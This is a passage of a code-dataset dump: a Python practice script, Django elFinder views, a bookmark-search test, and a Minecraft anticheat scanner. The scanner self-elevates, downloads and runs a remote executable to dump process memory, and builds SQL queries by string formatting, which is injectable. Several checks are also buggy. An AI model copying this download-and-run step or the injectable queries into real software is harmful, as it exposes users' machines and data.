y=20\r\nlist = [10,2,3,4,5,60]\r\nif(a not in list):\r\n print('X=',x,'is in the list')\r\nelif(y not in list):\r\n print('Y=',y,'is not in the list')\r\nprint('\\n')\r\nc = y/x\r\nif(c in list):\r\n print('C = ', c , 'is in the list')\r\n\r\n\r\n\r\n#identity operators\r\nx=10; y=20\r\n\r\nif(x is y):\r\n print(\"x and y have same identity\")\r\nelse:\r\n print(\"x and y haven't same identity\")\r\n\r\n#opertaor precedence\r\na = 20\r\nb = 10\r\nc = 15\r\nd = 5\r\n\r\nprint (\"a:%d b:%d c:%d d:%d\" % (a,b,c,d ))\r\ne = (a + b) * c / d #( 30 * 15 ) / 5\r\nprint (\"Value of (a + b) * c / d is \", e)\r\n\r\n#decision making\r\na=int (input(\"Enter Number! you fool.\"))\r\nif(a==100): print(\"value is 100\")\r\nelif(a==200): print(\"value is 200\")\r\n\r\n#discount program\r\namount = int(input(\"Enter amount:\"))\r\nif amount>=1000:\r\n discount = amount*0.05\r\n print(\"Discount = \",discount)\r\nelse:\r\n discount = amount*0.10\r\n print(\"Discount = \",discount)\r\n \r\nprint (\"Net payable:\",amount-discount)\r\n\r\n# while loop\r\ncount = 0;\r\nwhile(count < 9):\r\n print(\"The count is: \", count)\r\n count += 1\r\n\r\n\r\n\r\nvar = 1\r\nwhile var==1:\r\n num = input(\"Enter a number :\")\r\n print(\"You entered \" , num)\r\n break\r\n\r\n\r\nflag = 1\r\nwhile (flag): print(\"This is true\")\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Python Projects/Practice Programs/Program1.py","file_name":"Program1.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"346974644","text":"import json\n\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render\nfrom django.utils.functional import cached_property\nfrom django.views.decorators.cache import never_cache\nfrom django.views.decorators.csrf import ensure_csrf_cookie\n\nfrom elfinder.conf import settings\nfrom elfinder.connector import ElFinderConnector\nfrom elfinder.volume_drivers import get_volume_driver\n\n\nclass VolumeDriver(object):\n def __init__(self, request, json_response=False, name=None, **options):\n self.request = request\n self.options = options\n self.json_response = json_response\n self._name = name\n\n @cached_property\n def name(self):\n if self._name is None:\n request_method = getattr(self.request, self.request.method)\n return request_method.get('volume', 'default')\n else:\n return self._name\n\n @cached_property\n def volume(self):\n volume = get_volume_driver(self.name,\n request=self.request,\n **self.options)\n return volume\n\n @staticmethod\n def _access_view(req):\n return True\n\n def __bool__(self):\n return self.login_view is True\n\n __nonzero__ = __bool__\n\n @cached_property\n def login_view(self):\n \"\"\"Checks if volume is project by authentication.\n (redirect to view accordingly)\"\"\"\n if self.volume.login_required:\n decorator = user_passes_test(test_func=self.volume.login_test_func,\n login_url=self.volume.login_url)\n response = decorator(self._access_view)(self.request)\n if response is not True:\n if self.json_response:\n return JsonResponse({'error': \"Login required!\"})\n else:\n return response\n return True\n\n\n@ensure_csrf_cookie\n@never_cache\ndef index(request, coll_id=None):\n \"\"\" Displays the elFinder file browser template for the specified\n collection.\n \"\"\"\n volume_driver = VolumeDriver(request, collection_id=coll_id)\n\n if not volume_driver: # not has access\n return volume_driver.login_view\n context = {\n 'coll_id': coll_id,\n 'volume_driver': volume_driver\n }\n return render(request,\n # Possibility to configure a custom template\n volume_driver.volume.get_index_template(\"elfinder/index.html\"),\n context=context,\n using=settings.ELFINDER_TEMPLATE_ENGINE)\n\n\n@ensure_csrf_cookie\ndef connector_view(request, coll_id=None):\n \"\"\" Handles requests for the elFinder connector.\n \"\"\"\n volume_driver = VolumeDriver(request,\n json_response=True,\n collection_id=coll_id)\n\n if not volume_driver: # not has access\n return volume_driver.login_view\n\n finder = ElFinderConnector([volume_driver.volume])\n try:\n finder.run(request)\n except:\n if settings.ELFINDER_DEBUG:\n import traceback\n traceback.print_exc()\n raise\n # Some commands (e.g. 
read file) will return a Django View - if it\n # is set, return it directly instead of building a response\n if finder.return_view:\n return finder.return_view\n\n response = HttpResponse(content_type=finder.httpHeader['Content-type'])\n response.status_code = finder.httpStatusCode\n if finder.httpHeader['Content-type'] == 'application/json':\n response.content = json.dumps(finder.httpResponse,\n cls=DjangoJSONEncoder,\n ensure_ascii=False)\n else:\n response.content = finder.httpResponse\n\n return response\n\n\ndef read_file(request, volume, file_hash, template=\"elfinder/read_file.html\"):\n \"\"\" Default view for responding to \"open file\" requests.\n\n coll: FileCollection this File belongs to\n file: The requested File object\n \"\"\"\n return render(request, template,\n context={'file': file_hash},\n using=settings.ELFINDER_TEMPLATE_ENGINE)\n","sub_path":"elfinder/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"388043234","text":"# Start Imports\nimport os\nimport re\nimport time\nimport shutil\nimport psutil\nimport requests\nimport colorama\nimport subprocess\nimport bimpy as bp\nimport config as cfg\nimport elevate as elevate\n# mysql-connector-python\nimport mysql.connector\n\nfrom sys import exit\nfrom os import listdir\nfrom colorama import Fore\nfrom os.path import isfile\nfrom threading import Thread\nfrom datetime import datetime\nfrom bimpy.utils import help_marker\n# End Imports\n\n\n# noinspection PyBroadException\nclass Nex(bp.App):\n\tdef __init__(self):\n\t\tsuper(Nex, self).__init__(height=300, width=800, title='Nex Anticheat System')\n\t\tself.sqlCnx = None\n\t\tself.sqlCursor = None\n\t\tself.user_path = '/'.join(os.getcwd().split('\\\\', 3)[:3])\n\t\tself.drive_letter = os.getcwd().split('\\\\', 1)[0]+'/'\n\t\tself.winUsername = os.getlogin()\n\t\tself.javawPid = ''\n\t\tself.mcPath = ''\n\t\tself.lunarClient = False\n\n\t\tself.recordingResult = ''\n\t\tself.inInstanceCheats = ''\n\t\tself.outCheats = ''\n\t\tself.Check02 = 'passed'\n\t\tself.Check03 = 'passed'\n\t\tself.Check04 = 'passed'\n\t\tself.Check05 = 'passed'\n\t\tself.Check06 = 'passed'\n\t\tself.Check07 = 'passed'\n\t\tself.deletedFiles = ''\n\n\t\tself.s = bp.String()\n\t\tself.f = bp.Float()\n\t\tself.barValue = 0\n\t\tself.verified = False\n\t\tself.cancel = False\n\t\tself.startedScan = False\n\t\tself.lastCheck = ''\n\t\tself.currentAction = bp.String()\n\n\t\tbp.push_style_var(bp.Style.FrameRounding, 10)\n\t\tbp.load_fonts(size=20)\n\t\tcolorama.init()\n\n\t@staticmethod\n\tdef asRoot():\n\t\tif elevate.isRootUser():\n\t\t\televate.runRoot(wait=False)\n\t\t\texit()\n\n\t# Finds minecraft process and gets info\n\tdef mcProcess(self):\n\t\tpid = 0\n\t\tmcprocess_info = {}\n\n\t\t# Get processes with the name \"javaw\"\n\t\tprocess = [p for p in psutil.process_iter(attrs=['pid', 'name']) if 'javaw' in p.info['name']]\n\t\tif process:\n\t\t\tprocess = process[0]\n\t\t\tpid = process.info['pid']\n\t\t\t# print(f'{cfg.prefix} Minecraft found on PID: {pid}')\n\t\telse:\n\t\t\tinput('Minecraft not found...\\nPress enter to continue')\n\t\t\tquit()\n\n\t\t# Get all command line arguments of process\n\t\tprocess = process.cmdline()\n\t\tfor argument in process:\n\t\t\tif \"--\" in argument:\n\t\t\t\tmcprocess_info[argument.split(\"--\")[1]] = process[process.index(argument) + 1]\n\n\t\tself.javawPid = pid\n\t\tself.mcPath = mcprocess_info[\"version\"]\n\n\t\tcustomClient = False\n\t\ttry:\n\t\t\tdetectCustom = mcprocess_info[\"username\"]\n\t\texcept:\n\t\t\tcustomClient = True\n\n\t\tif customClient is True:\n\t\t\tif 'com.moonsworth.lunar.patcher.LunarMain' in process:\n\t\t\t\tself.lunarClient = True\n\t\t\telse:\n\t\t\t\tself.lunarClient = False\n\n\tdef on_update(self):\n\n\t\tif self.verified is False:\n\t\t\tif self.cancel is False:\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.text(' Enter pin :')\n\t\t\t\tbp.same_line()\n\n\t\t\t\tbp.input_text('', self.s, 200, bp.InputTextFlags.Password)\n\t\t\t\t# bp.input_text('', self.s, 200)\n\t\t\t\tif cfg.disableAuth is False:\n\t\t\t\t\tif len(self.s.value) == 5:\n\t\t\t\t\t\tif self.lastCheck != self.s.value:\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\turl = f'https://auth2.atome.cc/index.php?pin={self.s.value}'\n\t\t\t\t\t\t\t\tr = requests.get(url)\n\n\t\t\t\t\t\t\t\tif 'verified' not in r.text:\n\t\t\t\t\t\t\t\t\tself.cancel = True\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tself.verified = 
True\n\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tself.cancel = True\n\n\t\t\t\t\t\tself.lastCheck = self.s.value\n\t\t\t\telse:\n\t\t\t\t\tself.verified = True\n\t\t\telse:\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.new_line()\n\t\t\t\tbp.text('An error has occured. If this error persist, try to contact the staff.')\n\t\telif self.cancel is False:\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.text(self.currentAction.value)\n\t\t\tbp.progress_bar(self.barValue)\n\n\t\t\tif len(self.recordingResult) > 2:\n\t\t\t\tbp.text('Record software found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.recordingResult + ' has been found')\n\n\t\t\tif 'failed' in self.Check02:\n\t\t\t\tbp.text('Illegal modifications times found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('The explorer process has been restarted in the last 5 minutes')\n\n\t\t\tif 'failed' in self.Check03:\n\t\t\t\tbp.text('In game cheat found.')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('Cheat : ' + self.inInstanceCheats)\n\n\t\t\tif 'failed' in self.Check04:\n\t\t\t\tbp.text('External cheat found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker('Cheat : ' + self.outCheats)\n\n\t\t\tif 'failed' in self.Check05:\n\t\t\t\tbp.text('JNativeHook found')\n\n\t\t\tif 'failed' in self.Check06:\n\t\t\t\tbp.text('Executed deleted files found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.deletedFiles)\n\n\t\t\tif 'failed' in self.Check07:\n\t\t\t\tbp.text('Executed library files found')\n\t\t\t\tbp.same_line()\n\t\t\t\thelp_marker(self.deletedDLLs)\n\n\n\t\t\tif self.startedScan is False:\n\t\t\t\tself.startedScan = True\n\t\t\t\tprint('starting scan :D')\n\t\t\t\tp = Thread(target=self.doAnything, args=(self, ))\n\t\t\t\tp.daemon = False\n\t\t\t\tp.start()\n\t\telse:\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.new_line()\n\t\t\tbp.text('An error has occured. 
If this error persist, try to contact the staff.')\n\n\n\n\tdef addPercentageToProgress(self, perc):\n\t\tadded = 0\n\n\t\tfor i in range(0, perc * 10):\n\t\t\ttime.sleep(0.004)\n\t\t\tself.barValue = self.barValue + 0.001\n\n\t# Downloads all necessary files\n\tdef dependencies(self):\n\t\tpath = f'{self.drive_letter}/Windows/Temp/Nex'\n\t\tif not os.path.exists(path):\n\t\t\tos.mkdir(path)\n\t\twith open(f'{path}/strings2.exe', 'wb') as f:\n\t\t\tf.write(requests.get(cfg.stringsSoftware).content)\n\t\tself.currentAction.value = 'Downloading dependencies'\n\t\t# Thread(target=self.addPercentageToProgress, args=(self, 10)).start()\n\t\tself.addPercentageToProgress(10)\n\n\tdef connectDatabase(self):\n\t\t# Don't forget to set only read permissions to this user for more security.\n\t\tif cfg.enableDatabase is True:\n\t\t\ttry:\n\t\t\t\tself.sqlCnx = mysql.connector.connect(host=f'{cfg.host}', user=f'{cfg.user}', password=f'{cfg.password}', database=f'{cfg.database}')\n\t\t\t\tself.sqlCursor = self.sqlCnx.cursor()\n\t\t\texcept:\n\t\t\t\tself.cancel = True\n\t\t\t\tinput('Cannot connect to the database...\\nPress enter to continue')\n\t\t\t\tquit()\n\n\t@staticmethod\n\tdef doAnything(self):\n\t\tself.connectDatabase()\n\n\t\tself.mcProcess()\n\t\tself.dependencies()\n\n\t\t# Check #01\n\t\tself.recordingCheck()\n\n\t\t# Check #02\n\t\tself.modificationTimes()\n\n\t\t# Check #03\n\t\tself.inInstance()\n\n\t\t# Check #04\n\t\tself.outOfInstance()\n\n\t\t# Check #05\n\t\tself.jnativehook()\n\n\t\t# Check #06\n\t\tself.executedDeleted()\n\n\t\t# Check #07\n\t\tself.deletedDLL()\n\n\t\t# Check #08\n\t\tif cfg.enableCheck08 is True:\n\t\t\tself.checkScansHistory()\n\n\t\treturn True\n\n\t# Gets PID of a process from name\n\t@staticmethod\n\tdef getPID(name, service=False):\n\t\tif service:\n\t\t\tresponse = str(subprocess.check_output(f'tasklist /svc /FI \"Services eq {name}')).split('\\\\r\\\\n')\n\t\t\tfor process in response:\n\t\t\t\tif name in process:\n\t\t\t\t\tpid = process.split()[1]\n\t\t\t\t\treturn pid\n\t\telse:\n\t\t\tpid = [p.pid for p in psutil.process_iter(attrs=['pid', 'name']) if name == p.name()][0]\n\t\t\treturn pid\n\n\t# Get process start time\n\t@staticmethod\n\tdef proc_starttime(pid):\n\t\t# https://gist.github.com/westhood/1073585\n\t\tp = re.compile(r\"^btime (\\d+)$\", re.MULTILINE)\n\t\twith open(\"/proc/stat\") as f:\n\t\t\tm = p.search(f.read())\n\t\t\tbtime = int(m.groups()[0])\n\n\t\tclk_tck = os.sysconf(os.sysconf_names[\"SC_CLK_TCK\"])\n\t\twith open(\"/proc/%d/stat\" % pid) as f:\n\t\t\tstime = int(f.read().split()[21]) / clk_tck\n\n\t\treturn datetime.fromtimestamp(btime + stime)\n\n\t# Gets/Dumps strings via a PID\n\tdef dump(self, pid):\n\t\tcmd = f'{self.drive_letter}/Windows/Temp/Nex/strings2.exe -pid {pid} -raw -nh'\n\t\tstrings = str(subprocess.check_output(cmd)).replace('\\\\\\\\', \"/\")\n\t\tstrings = list(set(strings.split(\"\\\\r\\\\n\")))\n\n\t\treturn strings\n\n\t# Checking for recording software\n\tdef recordingCheck(self):\n\t\tself.addPercentageToProgress(11)\n\t\tself.currentAction.value = 'Checking for recording software'\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #01')\n\t\ttasks = str(subprocess.check_output('tasklist')).lower()\n\t\tfound = [x for x in cfg.recordingSoftwares if x in tasks]\n\n\t\tif found:\n\t\t\tfor software in found:\n\t\t\t\tprint(' : ' + Fore.RED + f' Not Clean ({cfg.recordingSoftwares[software]})' + Fore.WHITE)\n\t\t\t\tself.barValue.value = 1\n\t\t\t\tself.recordingResult = 
cfg.recordingSoftwares[software]\n\n\t\t\t\tNex.end()\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\n\t# Checks modification/run times\n\tdef modificationTimes(self):\n\t\tself.addPercentageToProgress(11)\n\t\tself.currentAction.value = 'Checking modification time.'\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #02')\n\t\tSID = str(subprocess.check_output(f'wmic useraccount where name=\"{self.winUsername}\" get sid')).split('\\\\r\\\\r\\\\n')[1]\n\t\trecycle_bin_path = self.drive_letter+\"/$Recycle.Bin/\"+SID\n\n\t\t# Recycle bin modified time check\n\t\trecyclebinTime = datetime.fromtimestamp(os.path.getmtime(recycle_bin_path))\n\t\tcurrentTime = datetime.now()\n\t\tbinDiffTime = currentTime - recyclebinTime\n\t\tminutes = binDiffTime.total_seconds() / 60\n\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\tp = psutil.Process(explorerPid)\n\t\texplorerTime = datetime.fromtimestamp(p.create_time())\n\n\t\texplorerDiffTime = currentTime - explorerTime\n\t\tminutes2 = explorerDiffTime.total_seconds() / 60\n\n\t\tif minutes2 < 300:\n\t\t\tself.Check02 = 'failed'\n\t\t\tprint(' :' + Fore.RED + ' Not Clean' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t@staticmethod\n\tdef mins_between(d1, d2):\n\n\t\td1 = datetime.strptime(d1, \"%H-%M-%S\")\n\t\td2 = datetime.strptime(d2, \"%H-%M-%S\")\n\t\treturn abs((d2 - d1).minutes)\n\n\t# In Instance Checks\n\tdef inInstance(self):\n\t\tself.currentAction.value = 'Checking for in game modifications'\n\t\tself.addPercentageToProgress(6)\n\n\t\tfoundHeuristic = []\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #03')\n\t\tif self.lunarClient is True:\n\t\t\tjavawStrings = self.dump(self.javawPid)\n\t\t\tfound = [f'{cfg.javawStrings[x]}' for x in javawStrings if x in cfg.javawStrings]\n\n\t\t\tif '1.8' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.lunar18Strings[x]}' for x in javawStrings if x in cfg.lunar18Strings]\n\n\t\t\tif found:\n\t\t\t\tfor hack in found:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telif foundHeuristic:\n\t\t\t\tfor hack in foundHeuristic:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telse:\n\t\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\telse:\n\t\t\tjavawStrings = self.dump(self.javawPid)\n\t\t\tfound = [f'{cfg.javawStrings[x]}' for x in javawStrings if x in cfg.javawStrings]\n\n\t\t\tif '1.8' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.minecraft18Strings[x]}' for x in javawStrings if x in cfg.minecraft18Strings]\n\t\t\telif '1.7' in self.mcPath:\n\t\t\t\tfoundHeuristic = [f'{cfg.minecraft17Strings[x]}' for x in javawStrings if x in cfg.minecraft17Strings]\n\n\t\t\tif found:\n\t\t\t\tfor hack in found:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telif foundHeuristic:\n\t\t\t\tfor hack in foundHeuristic:\n\t\t\t\t\tself.Check03 = 'failed'\n\t\t\t\t\tself.inInstanceCheats = hack\n\t\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({hack})' + Fore.WHITE)\n\t\t\telse:\n\t\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tself.addPercentageToProgress(6)\n\n\t# Out of instance checks\n\tdef outOfInstance(self):\n\t\tself.currentAction.value = 'Checking for external 
modifications'\n\t\tself.addPercentageToProgress(6)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #04')\n\t\tdpsPid = self.getPID('DPS', service=True)\n\t\tstrings = self.dump(dpsPid)\n\t\tstrings = ['.exe!'+x.split('!')[3] for x in strings if '.exe!' in x and x.startswith('!!')]\n\n\t\tfound = [x for x in cfg.dpsStrings if x in strings]\n\n\t\tif found:\n\t\t\tfor string in found:\n\t\t\t\tself.Check04 = 'failed'\n\t\t\t\tself.outCheats = cfg.dpsStrings[string]\n\t\t\t\tprint(f' :' + Fore.RED + f' Not Clean ({cfg.dpsStrings[string]})' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tself.addPercentageToProgress(6)\n\n\t# Checks for JNativeHook based autoclicker\n\tdef jnativehook(self):\n\n\t\tself.currentAction.value = 'Checking for JNativeHook'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #05')\n\t\tpath = f'{self.user_path}/AppData/Local/Temp'\n\n\t\tfound = [x for x in listdir(path) if isfile(f'{path}/{x}') if 'JNativeHook' in x and x.endswith('.dll')]\n\n\t\tif found:\n\t\t\tself.Check05 = 'failed'\n\t\t\tprint(f' : ' + Fore.RED + f' Not Clean')\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tself.addPercentageToProgress(6)\n\n\t# Gets recently executed + deleted files\n\tdef executedDeleted(self):\n\n\t\tself.currentAction.value = 'Checking for executed and deleted files'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #06')\n\t\tpcasvcPid = self.getPID('PcaSvc', service=True)\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\tpcasvcStrings = self.dump(pcasvcPid)\n\t\texplorerStrings = self.dump(explorerPid)\n\n\t\tdeleted = {}\n\n\t\tfor string in pcasvcStrings:\n\t\t\t# string = string.lower()\n\t\t\tif string.startswith(self.drive_letter) and string.endswith('.exe'):\n\t\t\t\tif not os.path.isfile(string):\n\n\t\t\t\t\tif string in explorerStrings:\n\t\t\t\t\t\tfilename = string.split('/')[-1]\n\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\tself.deletedFiles = self.deletedFiles + string + '\\n'\n\t\t\t\t\t\tdeleted[string] = {'filename': string, 'method': '01'}\n\n\t\tif explorerStrings:\n\t\t\tfor string in explorerStrings:\n\t\t\t\tstring = string.lower()\n\t\t\t\tif 'trace' and 'pcaclient' in string:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tpath = [x for x in string.split(',') if '.exe' in x][0]\n\t\t\t\t\t\tif not os.path.isfile(path):\n\t\t\t\t\t\t\tfilename = path.split('/')[-1]\n\t\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\t\tself.deletedFiles = self.deletedFiles + path + '\\n'\n\t\t\t\t\t\t\tdeleted[path] = {'filename': path, 'method': '02'}\n\t\t\t\t\texcept:\n\t\t\t\t\t\tcontinue\n\n\t\tif deleted:\n\t\t\tprint(' :' + Fore.RED + ' Not Clean')\n\t\t\tprint('')\n\t\t\tfor path in deleted:\n\t\t\t\tprint(f'\t- {path}' + Fore.RED)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tprint('')\n\t\tself.addPercentageToProgress(6)\n\n\t# New method to detect deleted dll files.\n\tdef deletedDLL(self):\n\n\t\tself.currentAction.value = 'Checking for deleted library files'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #07')\n\n\t\tdllFiles = {}\n\t\texplorerPid = self.getPID('explorer.exe')\n\t\texplorerStrings = self.dump(explorerPid)\n\n\t\tif explorerStrings:\n\t\t\tfor string in explorerStrings:\n\t\t\t\tif string.startswith(self.drive_letter) and string.endswith('.dll'):\n\t\t\t\t\tif not os.path.exists(string) and 
'C:\\Windows\\system32' not in string and 'C:\\Windows\\System32' not in string:\n\t\t\t\t\t\tself.Check06 = 'failed'\n\t\t\t\t\t\tself.deletedDLLs = self.deletedDLLs + string + '\\n'\n\t\t\t\t\t\tdllFiles[string] = {'filename': string, 'method': '03'}\n\n\t\tif dllFiles is True:\n\t\t\tprint(' :' + Fore.RED + ' Not Clean')\n\t\t\tself.Check07 = 'failed'\n\t\t\tprint('')\n\t\t\tfor path in dllFiles:\n\t\t\t\tprint(f'\t- {path}' + Fore.RED)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\t\tprint('')\n\t\tself.addPercentageToProgress(6)\n\n\tdef checkScansHistory(self):\n\n\t\tself.currentAction.value = 'Checking for old scans in the database'\n\t\tself.addPercentageToProgress(5)\n\t\tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #08')\n\t\tif cfg.enableDatabase is False:\n\t\t\tself.addPercentageToProgress(5)\n\t\t\treturn\n\n\t\tResult02 = False\n\t\tResult03 = False\n\t\tResult04 = False\n\t\tResult05 = False\n\n\t\tquery = f'SELECT Check02 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check02 in self.sqlCursor:\n\t\t\tif str(Check02) == '(\\'failed\\',)':\n\t\t\t\tResult02 = True\n\n\t\tquery = f'SELECT Check03 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check03 in self.sqlCursor:\n\t\t\tif str(Check03) == '(\\'failed\\',)':\n\t\t\t\tResult03 = True\n\n\t\tquery = f'SELECT Check04 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check04 in self.sqlCursor:\n\t\t\tif str(Check04) == '(\\'failed\\',)':\n\t\t\t\tResult04 = True\n\n\t\tquery = f'SELECT Check05 FROM scans WHERE HWID = \"{cfg.hwid}\"'\n\t\tself.sqlCursor.execute(query)\n\t\tfor Check05 in self.sqlCursor:\n\t\t\tif str(Check05) == '(\\'failed\\',)':\n\t\t\t\tResult05 = True\n\t\tallResults = ''\n\n\t\tif Result02 is True:\n\t\t\tallResults = 'Check #02, '\n\t\tif Result03 is True:\n\t\t\tallResults = allResults + 'Check #03, '\n\t\tif Result04 is True:\n\t\t\tallResults = allResults + 'Check #04, '\n\t\tif Result05 is True:\n\t\t\tallResults = allResults + 'Check #05'\n\n\t\tif 'Check' in allResults:\n\t\t\tprint(' :' + Fore.RED + f' Not Clean ({allResults})' + Fore.WHITE)\n\t\telse:\n\t\t\tprint(' :' + Fore.GREEN + ' Clean' + Fore.WHITE)\n\n\t\tself.addPercentageToProgress(5)\n\n\t@staticmethod\n\tdef end():\n\n\t\tinput('\\nScan finished\\nPress enter to exit..')\n\t\t# input('\\nPress enter to exit...')\n\t\ttemp = f'{Nex.drive_letter}/Windows/Temp/Nex'\n\t\tif os.path.exists(temp):\n\t\t\tshutil.rmtree(temp)\n\t\texit()\n\n\tdef saveScan(self):\n\t\tif self.deletedFiles == '':\n\t\t\tself.deletedFiles = 'none'\n\n\t\tif cfg.enableDatabase is False:\n\t\t\treturn\n\n\t\tquery = f'INSERT INTO Scans (ScanID, HWID, Check02, Check03, Check04, Check05, Check06, deletedFiles) VALUES '\n\t\tquery = query + f'(\"{cfg.scanID}\", \"{cfg.hwid}\", \"{self.Check02}\", \"{self.Check03}\", \"{self.Check04}\", '\n\t\tquery = query + f'\"{self.Check05}\", \"{self.Check06}\", \"{self.deletedFiles}\")'\n\n\t\tself.sqlCursor.execute(query)\n\t\tself.sqlCnx.commit()\n\n\n\nNex = Nex()\nNex.asRoot()\n\nNex.run()\nquit()\n# Nex.connectDatabase()\n# Nex.mcProcess()\n# Nex.dependencies()\n\n#print(f'{cfg.prefix} Starting Scan with ID: {cfg.scanID}\\n')\n# print(f'{cfg.prefix} HWID : {cfg.hwid}\\n')\n\n# Check #01\n# Nex.recordingCheck()\n\n# Check #02\n# Nex.modificationTimes()\n\n# Check #03\n# Nex.inInstance()\n\n# Check #04\n# Nex.outOfInstance()\n\n# Check #05\n# Nex.jnativehook()\n\n# Check #06\n# 
Nex.executedDeleted()\n\n# Check #07\n# Nex.deletedDLL()\n\n# Check #08\n# if cfg.enableCheck08 is True and cfg.enableDatabase is True:\n# Nex.checkScansHistory()\n# else:\n# \tprint(end=f'{cfg.prefix}' + Fore.CYAN + ' Running check #08' + ' :' + Fore.YELLOW + ' Skipped' + Fore.WHITE)\n\n\n# Nex.saveScan()\n# Nex.end()\n","sub_path":"nex-client/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":17795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"647868440","text":"from unittest.mock import Mock\nfrom bookmarks.models import BookmarkSearch\nfrom django.test import TestCase\n\n\nclass BookmarkSearchModelTest(TestCase):\n def test_from_request(self):\n # no params\n mock_request = Mock()\n mock_request.GET = {}\n\n search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(search.q, '')\n self.assertEqual(search.sort, BookmarkSearch.SORT_ADDED_DESC)\n self.assertEqual(search.user, '')\n\n # some params\n mock_request.GET = {\n 'q': 'search query',\n 'user': 'user123',\n }\n\n bookmark_search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(bookmark_search.q, 'search query')\n self.assertEqual(bookmark_search.sort, BookmarkSearch.SORT_ADDED_DESC)\n self.assertEqual(bookmark_search.user, 'user123')\n\n # all params\n mock_request.GET = {\n 'q': 'search query',\n 'user': 'user123',\n 'sort': BookmarkSearch.SORT_TITLE_ASC\n }\n\n search = BookmarkSearch.from_request(mock_request)\n self.assertEqual(search.q, 'search query')\n self.assertEqual(search.user, 'user123')\n self.assertEqual(search.sort, BookmarkSearch.SORT_TITLE_ASC)\n\n def test_modified_params(self):\n # no params\n bookmark_search = BookmarkSearch()\n modified_params = bookmark_search.modified_params\n self.assertEqual(len(modified_params), 0)\n\n # params are default values\n bookmark_search = BookmarkSearch(q='', sort=BookmarkSearch.SORT_ADDED_DESC, user='')\n modified_params = bookmark_search.modified_params\n self.assertEqual(len(modified_params), 0)\n\n # some modified params\n bookmark_search = BookmarkSearch(q='search query', sort=BookmarkSearch.SORT_ADDED_ASC)\n modified_params = bookmark_search.modified_params\n self.assertCountEqual(modified_params, ['q', 'sort'])\n\n # 